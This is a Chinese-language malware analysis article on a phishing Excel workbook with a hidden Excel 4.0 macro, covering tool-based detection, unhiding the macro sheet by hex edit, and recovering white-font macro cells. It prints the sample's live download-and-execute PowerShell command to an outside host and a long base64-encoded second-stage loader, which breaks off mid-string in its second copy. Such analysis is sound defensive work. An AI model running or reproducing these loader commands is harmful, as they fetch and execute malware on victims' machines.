查看原文
其他

分析钓鱼邮件搭载的Excel 4.0恶意宏

jishuzhain 看雪学院 2021-03-07

本文为看雪论坛优秀文章

看雪论坛作者ID:jishuzhain





简介


工欲善其事必先利其器,首先既然遇到的是宏病毒文件,所以本地得装好office,本文使用的环境为office2016,之后打开Excel。

咋和平时看到的Excel表格不一样?如果不嫌麻烦ocr一下图片里显示的意思大概是说得启用宏后才能查看到图片内容,本质就是诱惑用户来启用宏,所以文档存在宏代码的话一启动就被提示需要启用宏,别启用就对了。


对于宏病毒,笔者目前接(是)触(工)不(具)多(党),不过之前使用过一个Python工具oletools。如果是Python2.7环境则安装命令为:pip install oletools。


装好后,利用oletools工具里的mraptor(macrorapter)查看是否可疑,如下显示可疑文件:


如果使用olevba提取恶意宏会解析失败,如下:


如果之前没有过多接触宏病毒,到这里肯定就一头雾水。其实原因是该样本没有存在VBA宏,而是被检测到了Excel 4.0宏(这个技术存在的时间比我年龄还大,真的),属性设置为隐藏。


关于Excel 4.0宏暂时不过多介绍了,因为参考链接里介绍的很详细了,有兴趣就直接看文末的链接,没有兴趣直接看笔者接下来的操作。

不过虽然不能手工提取恶意代码,但是取巧也可以通过沙箱获取执行的命令,如下:


第一阶段命令,如下:

powershell -command IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://putin-malwrhunterteams.com/scan.txt')

第二阶段命令scan.txt内容如下,会使用IEX命令当做脚本内容执行。

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAJABWAFYAZgBPAEwAYQBHAGgAYwBOAGYARQBSAEUAdABpAEQAZgBvAFkATgBoAHgAaABDAFUAWgB0AE8AeABXAE0AQwBiAFAAUgBoAEkAZQBEAIAA9ACAAJwB5AFoAVgBNAE0AYQBiAHQAZwB3AFQAVABrAG4AWQB4AEwAcgBBAE4AVABlAHIAVABDAHAAbwBjAEIAdgAnADsADQAKACQAVwBHAGcAcgBkAFYAbQBnAD0AIAAkAFcARwBnAHIAZABWAG0AZwAgACsAIAAxADsAfQANAAoARgB1AG4AYwB0AGkAbwBuACAAbwB2AHEAcgBtAFMAawB5AHgAUgBQAE8AbQB1AFEAeQBRAGMAcgBzAGsAbwBRAEcATABQAGEASABUAEwAdgBxAFIAQQBWAEYATwBCAGwAewAgAHAAYQByAGEAbQAoACQAQgBYAGUAIAAsACAAJABYAEwAcQBIAHoAUgBWAFEAWgBzAGkAcgBjAHQAagB4AG0AbQBuAFAAVABpAEMASwBXAGwAegByAGwAdgAgACwAIAAkAHYARgBFAEEAbQBVAGsAQgB2AHgATwBTAGIAVAB5AEwAaQAgACwAIAAkAHkATwBPAGsATwBQAG8ASgBnAGsATgBTAGQAZgBkAFoAIAAsACAAJABsAFkAcwB4AGMAQwBrAHIAUwBGAFEAYgBxAFkAWgBRAFoAbgBnAEUASwBxAG8ATABkAG8AegBvAGMAVABpAG8AQgAgACwAIAAkAE0AbgBxAFYAVgBNAGQAcwB3AEsAWQBoAHAATQBMARABzAHcAVgBjAHYAagBnAFQAbwBEAHcAIAAsACAAJAB5AFcAYwBaAEsATABsAGEARQBSAFUAYgBTAHUAIAAsACAAJABuAHYAeQBtAEEAWgBRAHEAcgBnAEUAUgBEAEoAQgBoAEoAaABkAHkAbgB3AEkAZgBCAEIAIAAsACAAJAB6AGEAYwB1AEsAQQBGAHMAWQBxAFEAdwBwAGkAZwBrAHMARgB0AGkAUQBEAGsATAApAA0ACgAkAGYAeABzAFIAUgBXAEcATABkAGoAQQBhAHQAVABKAEEAZgBrAGcAWABzACAAPQAgACcAZQBsAFYAWQB4AG0AWQBMAGoAUAByAFQATQBuAHYAegBvAHAASgBQAGUAagBMAFYAeAAnADsADQAKACQAcQBWAFoAZQBWAE8AZgBDAFMARwB2AHMAWQBUAG0AUgBBAGsAagBaAEgAVgBFAGcAdgByAE4AZAB5AHYAWgBBAGIAegB2AEQAbQBFAHUAZABvAEoAIAA9ACAAJwBwAEQAdwBRAHAAYwBOAGoAYQBtAFgAcQBWAFEAdABqAGQAQQAnADsADQAKACQARQBYAGcAIAA9ACAAJwBSAFkAWABpAGUAdgBxAEcAbAB4AEEAUABjAHoAYQBZAEEAbABMAHkATgBFAEoAYQBuAHQAVgBRAGMAbQBGAHgASQBIAGYAcwBSAHUAaQBuACcAOwANAAoAJABmAG0AcwBVAEIAUQBrAEQAYwBCAFQATABoAGgATQBQAHgAdgBsAGEAYQBkAHkAcwBEAEcAVQBUAGkARwBGACAAPQAgACcAWQBPAGkAUgAnADsADQAKACQARgBsAGMAbABNAEEAawBsAGwAYgBhAFMAYwBVACAAPQAgACcAdwBNAEoAQwBEAUgB2AHYAUQBVAFYAdgBRAG0AUwB6AHYAegBzAEoASgBwAE4AZABPAEcAUgBlAHUAQgBHAG0ARwBHAE0ARgBmAGUAUABvAHEAZwAnADsADQAKACQAcwBlAG8AVgB5AEkAYQBYAGMAYgBxAG4AVwB3AFoAWgB0AHoAIAA9ACAAJwBCAE8ATwBqAHAASwBhAE4AVABRAGoARQBTAGMAVgAnADsADQAKACQAeQBaAGwAVABXAFQAZQBkAEsAUQBTAHAASgBHAEYAVwBvAFoAZgAgAD0AIAAnAGQAdgB6AEsAWQB1ACcAOwANAAoAJABHAHQAWABYAEwAQgBhACAAPQAgACcAegBIAGcAdQBoAGsAbABaAFoAcgBsAEUATgBLAE4AUAB0AHcAUABzAEQAWgBiACcAOwANAAoAJABiAE4AWABrAG0AcwBIAG4AaQBmAEYAUABIAGYAeQBVAHIAVwBhAFMAbQBwAHMAdwBnAEgAZQBPAG0AaQBYAGEAZwBsAFMAVABOAEIAbQAgAD0AIAAnAGsAeABXAGkARQB4AEgATgB5AHUAQQBoAHoASQBJAG0AVQBiAEQAZgBPAHQAQgBBAEgAZgBpAFcAJwA7AA0ACgAkAGUASABxAGsAdQBpAG8AVABLAHIAaQBBACAAPQAgACcAUQByAGgAcQBhAFgAZABnAHoAbQB4AEcAUgByAHcAJwA7AA0ACgAkAGEAWgBQAGwAQQBUAG4ASgB4AEYAWgBUAFMASgBqAFYAZgB5AGMAIAA9ACAAJwBTAFIARgBLAHQAZwBlAFYAcwAnADsADQAKACQAYwByAHIAeABrAFMAVABPAFAAdwBFAFkAcwBWAHkASgBOAHEAQwBjAGIAUwBPAG4ARAAgAD0AIAAnAFUARQBzAFUAbwBTAFIAVQAnADsADQAKACQAaQBiAFYAWQBSAEMAUQBqAGYARQB1AFkAagBNAGoAUwBvAFMAUQBCAEoAYwBEAHQAYwAgAD0AIAAnAE8AVwB1AEkAbQBHAFkAcwBQAGgAcwBSAGsAWgBMAGoAagBqAEoAagBrAHIASgBDAEEAegBBAFQAUwBGAFgAYgB3AFQAbgB1AHAAWABTAG4AQQByACcAOwANAAoAJABCAFoAWABpAHEAcABhAHQAVQBrAHMATgBYAE0AcwBJAG4ARwBGAFoASgBKAFIAVQBRAG0AUQB1AEwAUgBWAGoAdAB1AEgAYwBjAFEASgBkAHMAIAA9ACAAJwBEAHIARABHAFEAaAB3AFAAZQBoAHUAJwA7AA0ACgB9AA0ACgAkAG4AcgBJAEMAUgBFAFkAZwBoAEQATwBKAFUAYwBGAFAAIAA9ACAAJwBXAHcAYwBoAHgARwBhAFEASwBWAGoAeAB3AG0AbwBvAGIASABQAFUAYQB6AEYARQBMAGUAegAnADsADQAKAEYAdQBuAGMAdABpAG8AbgAgAGoASABmAE8AVgBtAEEAdQBBAFIAbQBrAHEASQBBAHgATQBHAEgAawBVAFYAYgBBAHsAIABwAGEAcgBhAG0AKAAkAHUAbABuAGIAaABrAEkAawBTAGoAcABsAGgAbABHAGkAcABqAGwAUgBaAFUAcwBWAHAAIAAsACAAJABFAFgAcgBYAFYAVABIAHgAVwBZAGkASABRAE0AZQBEAFcAcgBSAGUAbQBvAHMAVwBPAGMAcwBoAEMAWgB0AFMAbQBsAGYAbAB0AHUATwBXACAALAAgACQAawBQAGkAQQBoAFMAWQBuAFcAeQBBAEQATABJAFAAZQBVAEkAdABhAFoAdQB3AGYAUAAgACwAIAAkAGUAaAB0AEoAYwBkAHYAQgBDAFoASwBXAGcASgBUAHUAZwBiAHMAIAAsACAAJABhAGQAUABHAFoAbABWAHYARABwAFMAQwBsACAALAAgACQAbwByAHUATQBXAFcASQBLAEcAcQBVAHkAKQANAAoAJABGAFcARwBRAFcAWgBtAGIASgBsAG8AWQBiAHgAUABrAFIAbgAgAD0AIAAnAEgAYwBmAE4ASQBNAHQAagBNAE4ASABPAGYAZQB0AFAAUQB1AGUAZQBzAEEASQAnADsADQAKACQAWABMAFkAbABKAHIAQQBDAGgAQgBzAHIAWgBJAHgARQBkAHAAWgBOAEMAWABJAHUAaABoAHoAcAAgAD0AIAAnAEoAaABIAFQAeQBxAHcAbgBJAGEAVQBNAEUAZwBkAGwAQwBwAEkAdwBaAEIAQwBhAHUAZgB6AEQAZQBFAGIAcwBLAE8AJwA7AA0ACgAkAFQAbABZAGIAUgBCAFEAVQBQAEYAQgB4AHEAZQBJAGYAcwBxAHMATgBJACAAPQAgACcAaABZAFQAcgB0AEkARQB5AGIAQwBxAEoASwBBAGQATwByAHYASgBnAG4AVQB0AGgASgBZACcAOwANAAoAJABZAGoAQgBSAEEAUABvAEUAegBJAFoASQBIAFEAUQBkAHoARwBoACAAPQAgACcASQBCAGUAegB4AEUAYwByAE0AZQBsAGkAVQBtAGYAUABhAGsAJwA7AA0ACgB9AA0ACgAkAHIAZQBnACAAPQAgACgAJwB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAnAC0AZgAnAGQAUwB0ACcALAAnAHIAaQBuACcALAAcIGAARABgAG8AYAB3AG4AYABsAGAAbwBhAB0gLAAnAGcAJwApADsAWwB2AG8AaQBkAF0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAGEAbABOAGEAbQBlACgAJwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAnACkAOwAkAGYAagA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBwAGEAcwB0AGUALgBlAGUALwByAC8AZQA0ADkAdQAwACcAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAQAAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIANwA4ACIAKQB8AEkARQBYADsAWwBCAHkAdABlAFsAXQBdACQAZgA9AFsATQBpAGMAcgBvAHMAbwBmAHQALgBWAGkAcwB1AGEAbABCAGEAcwBpAGMALgBJAG4AdABlAHIAYQBjAHQAaQBvAG4AXQA6ADoAQwBhAGwAbABCAHkAbgBhAG0AZQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgABwgYABOAGAAZQBgAFQAYAAuAGAAVwBgAGUAYABCAGAAQwBgAGwAYABpAGAAZQBgAE4AYABUAB0gKQAsACQAcgBlAGcALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwBzACcAIAArACAAWwBDAGgAYQByAF0ANQA4ACAAKwAgACcALwAvAHAAYQBzAHQAZQAuAGUAZQAvAHIALwBkAGwATwBNAHoAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAawAgAYQBjAGsAaQB0AHUAcABdADoAOgBlAHgAZQAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA= | &('I'+'EX')





如何取消隐藏属性?


该样本是无法通过右键来取消隐藏的,因为首先文档里不显示宏工作表,想右键取消会发现没有选项,但是这里可以使用oledump这个工具辅助一下,使用的命令如下:

oledump_V0_0_50>oledump.py -p plugin_biff.py --pluginoptions "-o BOUNDSHEET -a"  C:\Users\onion\Desktop\Dokumentation.xls\Dokumentation.xls


得到位置序列:51 AA 02 00 01,0x00表示不隐藏,0x01表示隐藏,0x02表示深度隐藏。


直接手工修改十六进制,如下:


当保存后重新打开会出现宏工作表,不过宏代码目前是无法显示的,因为字体设置为白色了,也是为了对抗分析,增加迷惑性。


我们可以选中后更改字体颜色,让宏代码显示出来。





如何手工提取宏代码?


由于字体显示空白,可将其复制,之后再新建XLM 4.0宏表,粘贴至另外的宏工作表,然后全选中,接着修改文字颜色,就可以查看了。咦,出现了明显的PowerShell脚本痕迹。


最后整理一下,完整代码如下:

=RETURN()p://putin-malwrhunterteams.com/scan.txt');exit=EXEC("powershell -command " & "IEX (new`-OB`jeCT('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'t" & A9588)

拿到响应内容,如下:

PowERsHELl.`ExE -ExecutionPolicy bypass -w 1 /e RgB1AG4AYwB0AGkAbwBuACAAWgBoAFoAZwB7ACAAcABhAHIAYQBtACgAJAB4AEkAeABmAG0AVABGAEwASAB2AFEAUgBOACAALAAgACQARwBQAHQARQBsAHQASwBTAGwAUwBCAEkARAB3AEEAcgBPAHAAaAByAGgARgB5AGcAeAB4ACAALAAgACQAcQBmAGoAeQBkAHoAbwBSAHgAUgBnAFAAQQBEAGUAWABmAGQAZABQAEoASwBRAGgAYQBrAFYAdwBBAFIATQBIAG8AdgBUAG4AQwBUAFgASQBQAGYAKQANAAoAJABEAGkAUwBDAFQAaABvAGcAUABDAFgAdABlAHIAUQBnAEYAWgBiAEUAawByAFYATABHAFUAQQBlAEgAcQB6AEEARAAgAD0AIAAnAHQAUwB5AEoAbgBHAEgAbgBYAHoAdwBlAGUAWABPAFcAVQBJAHkAYwBDAEwATgBIAHcAeQBoAEsAWQAnADsADQAKACQAQwBXAHAAdgB5AHkAaQB2AGwAVQB4AHgAVQBWAE8AYgBxAGQAUABsAFcAcQAgAD0AIAAnAGIAZgBpACcAOwANAAoAJAByAE0AbwBaAHcAIAA9ACAAJwB5AHgAYQBwAGkAWgBQAG8AWQBXAGUAZgBGACcAOwANAAoAJAByAHMAVgBJAEUAdQBtAEMATABVAE8AUQBQAHUAcQBqAHcAdgBBAGkAVgBZAG8AbQBIAEQAQQB4AHkAVABYAHcAWgByAE0AeQAgAD0AIAAnAGcAVgBCAGIAdwBsAEcAYgBTAEoAVgB4AG8AYQBqAGUAVwBWAFQARABpAEIAQQB1AHAARAByAHcAUgBxAFgAaABzAHIAUQBaAHkAJwA7AA0ACgAkAFkAbQBpAEwAbwB1AGUAIAA9ACAAJwBKAHQAJwA7AA0ACgAkAFIAQwBXAHQAdgBKAGUAVgBIAG0AcwB0AEoASgBiAGwAbwBGAHgASgBKAGcAUQB3AGcAVgBXAE0ARwBRAHAAdQB5AEgAIAA9ACAAJwBvAEIAJwA7AA0ACgB9AA0ACgAkAHgAaQBtAEUAcgBVAGcAdABZAEMATgBJAHEAdQBNAGsAZgBsAG0AWgBNAFoAbQBSAE8AcgB3AHkAdgBDAEkAbgBqAEEAIAA9ACAAJwBPAFgARQBvAHYAUQBuAHgAJwA7AA0ACgBJAGYAIAAoACcAegB4AFoAdQBpAE8AYgBQAEIAYwBiAFgAdwBVAHAAegBZAGkAJwAgAC0AZQBxACAAJwBWAHQAYQBZAHEAbQB4AE0AYgB3AHIASgBaAGMAUgBTAFIAUgBCAFAAZwBhAHQAbABIAFkAawBTAEMATwBvAFgAaABvAGIAYgBZAFoAagBIAGsAQgAnACkAIAB7AA0ACgAkAFMASwAgAD0AIAAnAEMAdgBlAEMAWQBpAFcAUwBSAHYAegBvAFEAUgBDAGYASwAnADsADQAKACQASABUAGIAawBBAHEAdAByAGgAdQBmAGYAIAA9ACAAJwBiAGIAcABWAHAAbwBBAHAARwBCAFAAVwBmAGIAagBJAFIARgBGAHEAbgBMAHEAJwA7AA0ACgAkAFMAdQBkAaABBAGMAbgBsAFYAWQBOAGIAdwBOAHIASgBYAEEAUwBNAE4AVgBQAEoAaQBRAG8AYQBvAG0AUABrAHgARAB1ACAAPQAgACcAcwBJACcAOwANAAoAJABZAGMAbABLAEMAVwAgAD0AIAAnAFUAcwBOAGcAUQBLAFgAZQBFAFoAWQB5AHkAawB0AdwBpAEkAYwBkAHQAUwByAFIATwB2AHQAJwA7AA0ACgAkAGMASwBNAG4AQgB2AHcATQBJAFcARgBNAFQAeQBWAGIAdABLAFYAbABQAG8AYgB1AHQARABiAFoAVwBPAEIAIAA9ACAAJwBkAHUAYgBPAE0ASwB3AHAAcQBBAG8ATABEAFAAJwA7AA0ACgAkAHYAdwBQAFkARQBhAEkAVQBvAGkAIAA9ACAAJwB0AHgAVABYAHAAdABWAHEAaQBZAFcASABPAGkATgBmACcAOwANAAoAfQANAAoAJABQAHoAUQBxAGUAdABnAGMASABxAHgAbwBWAGEAbgBmAHUAUgB5AFYAVABLAHYAcQBNAGcAbABZAHAAQQBwAHEAdQBPAEUAcABTAGEAUAAgAD0AIAAnAG4AdQBpAEMAWAAnADsADQAKAEQATwB7AA0ACgAkAFoAYgB0AFMATABUAG0AcABOAGcAWQBiAGsAbgB6AGwAdAB3AFMAdwBnAEcAYgBCAFEASABHAGQAawAgAD0AIAAnAEEAUABVAGIAQgBkAEsARwBTAGQAVQBSAGEAYQAnADsADQAKACQAZwBKAFQAVgBNAFQAWABqAHgAQgBTAHoAcgBDAEQATQBKAEYAeQBnAEkARwBJAGwAVwAgAD0AIAAnAG4AZABvAGIATwBnAEIAWQBrAHgAbgBIAFgAdgBkAGcAWABaAGkAZABTAEQAUAAnADsADQAKACQATABNAGIAdABVAFoAQQBoAHoAbABnAHQAdQBWAG4AbQAgAD0AIAAnAFQAUwBHAFoAQgBoAEQAQwBjAGoAaQBEAHMASQBqAE8AWABRAEMARQBJAEUASwB3AEYASQBsAFAAagBsAEIAbQB2AGYAegBsAEkAcwBKAGUAWQByACcAOwANAAoAJABxAFMAZQBHAGQAeABlAFgARgBrAGkAcABQAEgASgBUAHMAdwBuAFMAcgBoAHcASABOAEoAeABGAGUARwBZAGcAUQBNAFQAZQBiACAAPQAgACcASQBTAEYAJwA7AA0ACgAkAHcAQgBOAHAAagBlAHoAWQBRAGkAawBZACAAPQAgACcASgBWACcAOwANAAoAJABzAFQAegBZAHQAeQBNAEIAWgBEAG4AZQByAHEAbgBWAE4AZABrAHUAIAA9ACAAJwBYAFoAVABHAEYAcQBxAHYAcwBMAEsASQBGAEoAbwBTAGcAVQB5AG8ATABRAGcAcQBWAGgAYQB1AE8ASwBXAFkAYgBjAFUAdQBnAFMAbgAnADsADQAKACQATgB5AGkAPQAgACQATgB5AGkAIAArACAAMQA7AH0AIABXAGgAaQBsAGUAIAAoACQATgB5AGkAIAAtAG4AZQAgADYAKQANAAoAVwBoAGkAbABlACAAKAAkAFcARwBnAHIAZABWAG0AZwAgAC0AbgBlACAANgApACAAewANAAoAJABEAGcASgBtAEYAaQBIAHQAYwBsAFkAUAB2AGcAaABvAGwAaABjAG8AdQBsAE4AaABxAFMARgBrAG8ATgB6AHUAdAB1AEwAZABOAG0AVgB1AE4AQgBEACAAPQAgACcATwBzAGEAWgB5AEMAcwBvAEoAcwBGAFIAVABjAHYAbgBjAFgARQBQAGwAZQBXAEIAVgBFAGIAeQBMACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGEAdABpAGYAVAB4AHIAZgBsAG0AVgBMAGsAQQBwAHQASwBrAHIAaQBSAHEAdwBvAHcAagBXAFoARAAgAD0AIAAnAGEAdABjAGIAUgBMAGoAbgBKAHgAdgB4AGwAUwB1AGEAdABWAEwAYwB0AHIASABkAFIAawB3AHQAagBqAGIAUwBiAHIATABiAGkASgBqACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAEoAVwBiAHQAbQBUAEUAZQB0AFYAcQBBAE8AYgBBAGoAbQB6AEoAZwBQAHAARABaAFcAZAAgAD0AIAAnAHQASABTAHIAawBtAGgAUwBXAFAATgBxAHgAZgBSAHoATwB0AGIAJwA7AA0ACgAkAFcARwBnAHIAZABWAG0AZwA9ACAAJABXAEcAZwByAGQAVgBtAGcAIAArACAAMQA7ACQAegByAGIAcAAgAD0AIAAnAHoAQwBPAFUAVABCAFgASgB5AEwAWABiAGQARgBPAGgASgBkAFUAWQBJAE0AQQB5AHEAcABnAHYAWgBWACcAOwANAAoAJABXAEcAZwByAGQAVgBtAGcAPQAgACQAVwBHAGcAcgBkAFYAbQBnACAAKwAgADEAOwAkAGYAZABJACAAPQAgACcAagBUAHkARABOAHEAZwB5AFUAdQBZAGsAbgBNAFcAcQBOAEgAUQBhAG4AQgBRAGQAZQBVAGIAagBjAEkAcwAnADsADQAKACQA